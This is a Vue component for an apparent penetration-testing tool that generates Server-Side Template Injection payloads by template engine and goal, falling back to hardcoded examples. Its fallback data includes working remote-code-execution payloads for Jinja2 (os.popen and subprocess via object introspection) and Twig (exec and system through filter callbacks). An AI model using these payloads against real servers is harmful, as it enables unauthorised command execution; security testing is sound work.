<template>
  <div>
    <div class="mb-6">
      <p class="text-sm text-gray-400 mb-4">
        Generate Server-Side Template Injection payloads tailored for specific template engines and goals.
      </p>
      
      <div class="grid grid-cols-1 md:grid-cols-2 gap-4 mb-4">
        <UFormGroup label="Template Engine">
          <USelect
            v-model="engine"
            :options="engineOptions"
            placeholder="Select template engine"
          />
        </UFormGroup>
        
        <UFormGroup label="Goal">
          <USelect
            v-model="goal"
            :options="goalOptions"
            placeholder="Select goal"
          />
        </UFormGroup>
      </div>
      
      <div class="flex justify-center mt-4">
        <UButton
          icon="i-heroicons-puzzle-piece"
          color="orange"
          :loading="isLoading"
          :disabled="!engine || !goal || isLoading"
          @click="generatePayloads"
        >
          Generate SSTI Payloads
        </UButton>
      </div>
    </div>
    
    <div v-if="isLoading" class="flex justify-center my-8">
      <UProgress animation="carousel" />
    </div>
    
    <div v-if="error" class="mt-6 p-4 bg-red-900/50 border border-red-700 text-red-200 rounded-lg font-mono">
      {{ error }}
    </div>
    
    <template v-if="payloads.length > 0 && !isLoading">
      <div class="mt-8">
        <h3 class="text-lg font-semibold mb-4">Generated SSTI Payloads</h3>
        
        <div class="space-y-4">
          <UCard
            v-for="(payload, index) in payloads"
            :key="index"
            :ui="{ body: { padding: 'p-4' } }"
          >
            <div class="mb-2">
              <span class="font-medium text-cyan-400">{{ payload.technique }}</span>
              <p class="text-sm text-gray-300 mt-1">{{ payload.description }}</p>
            </div>
            
            <div class="bg-gray-800 p-3 rounded-lg font-mono text-sm overflow-x-auto">
              {{ payload.payload }}
            </div>
            
            <div class="flex justify-end mt-4 gap-2">
              <UButton
                icon="i-heroicons-clipboard-document"
                color="gray"
                variant="soft"
                @click="copyToClipboard(payload.payload)"
              >
                Copy
              </UButton>
              <UButton
                icon="i-heroicons-chat-bubble-left-right"
                color="purple"
                variant="soft"
                @click="askAboutPayload(payload)"
              >
                Ask WebSec Agent
              </UButton>
            </div>
          </UCard>
        </div>
      </div>
    </template>
    
    <UModal v-model="isApiKeyWarningOpen">
      <ApiKeyWarningModal 
        @close="isApiKeyWarningOpen = false" 
        @go-to-settings="handleGoToSettings" 
      />
    </UModal>
  </div>
</template>

<script setup>
import { useSettingsStore } from '~/stores/settings';
import { vulnerabilityService } from '~/services/api';

const settingsStore = useSettingsStore();
const engine = ref('');
const goal = ref('');
const isLoading = ref(false);
const error = ref(null);
const payloads = ref([]);
const isApiKeyWarningOpen = ref(false);

const engineOptions = [
  { value: 'jinja2', label: 'Jinja2 (Python)' },
  { value: 'twig', label: 'Twig (PHP)' },
  { value: 'freemarker', label: 'FreeMarker (Java)' },
  { value: 'velocity', label: 'Velocity (Java)' },
  { value: 'handlebars', label: 'Handlebars (JavaScript)' },
  { value: 'erb', label: 'ERB (Ruby)' },
  { value: 'thymeleaf', label: 'Thymeleaf (Java)' }
];

const goalOptions = [
  { value: 'detection', label: 'Detection' },
  { value: 'info', label: 'Information Disclosure' },
  { value: 'rce', label: 'Remote Code Execution' },
  { value: 'file_read', label: 'File Read' },
  { value: 'file_write', label: 'File Write' }
];

// Initialize settings
onMounted(() => {
  settingsStore.initialize();
});

const generatePayloads = async () => {
  if (!settingsStore.isApiKeySet) {
    isApiKeyWarningOpen.value = true;
    return;
  }
  
  if (!engine.value || !goal.value) {
    error.value = 'Please select both a template engine and a goal';
    return;
  }
  
  error.value = null;
  isLoading.value = true;
  payloads.value = [];
  
  try {
    // Call the backend API
    const result = await vulnerabilityService.generateSstiPayloads(engine.value, goal.value);
    payloads.value = result.payloads || [];
    
    // If no payloads returned, use fallback
    if (payloads.value.length === 0) {
      throw new Error('No payloads generated by API');
    }
  } catch (e) {
    console.error('SSTI generation error:', e);
    error.value = e.response?.data?.error || e.message || 'Failed to generate SSTI payloads';
    
    // Fallback to client-side generation for common cases
    if (engine.value === 'jinja2') {
      if (goal.value === 'detection') {
        payloads.value = [
          {
            technique: 'Basic Math Operation',
            description: 'Tests if template expressions are evaluated',
            payload: '{{ 7*7 }}'
          },
          {
            technique: 'Object Inspection',
            description: 'Attempts to access internal Python objects',
            payload: '{{ self }}'
          }
        ];
      } else if (goal.value === 'rce') {
        payloads.value = [
          {
            technique: 'OS Module Access',
            description: 'Uses Python\'s os module to execute commands',
            payload: '{{ self.__init__.__globals__.__builtins__.__import__(\'os\').popen(\'id\').read() }}'
          },
          {
            technique: 'Subprocess Execution',
            description: 'Uses subprocess module for command execution',
            payload: '{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__[\'__import__\'](\'subprocess\').check_output(\'ls\',shell=True)}}{% endif %}{% endfor %}'
          }
        ];
      }
    } else if (engine.value === 'twig') {
      if (goal.value === 'detection') {
        payloads.value = [
          {
            technique: 'Basic Math Operation',
            description: 'Tests if template expressions are evaluated',
            payload: '{{ 7*7 }}'
          },
          {
            technique: 'Print Function',
            description: 'Tests if print function works',
            payload: '{% if print(1+1) %}{% endif %}'
          }
        ];
      } else if (goal.value === 'rce') {
        payloads.value = [
          {
            technique: 'Code Execution',
            description: 'Uses _self.env.registerUndefinedFilterCallback to execute PHP code',
            payload: '{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}'
          },
          {
            technique: 'System Function',
            description: 'Uses PHP\'s system function to execute commands',
            payload: '{% set cmd = \'system\' %}{{ _self.env.filters[cmd](\'id\') }}'
          }
        ];
      }
    }
    
    // If still no payloads, provide generic ones
    if (payloads.value.length === 0) {
      payloads.value = [
        {
          technique: 'Generic Detection',
          description: 'Basic test for template evaluation',
          payload: '${7*7}'
        },
        {
          technique: 'Alternative Syntax',
          description: 'Alternative syntax for template evaluation',
          payload: '#{7*7}'
        }
      ];
    }
  } finally {
    isLoading.value = false;
  }
};

const copyToClipboard = async (text) => {
  try {
    await navigator.clipboard.writeText(text);
    // Could show a toast notification here
  } catch (e) {
    console.error('Failed to copy to clipboard:', e);
  }
};

const askAboutPayload = (payload) => {
  navigateTo({
    path: '/websec-agent',
    query: { 
      message: `Can you explain how this ${engine.value} SSTI payload works? Payload: ${payload.payload}`
    }
  });
};

const handleGoToSettings = () => {
  isApiKeyWarningOpen.value = false;
  // Navigate to settings or open settings modal
};
</script>
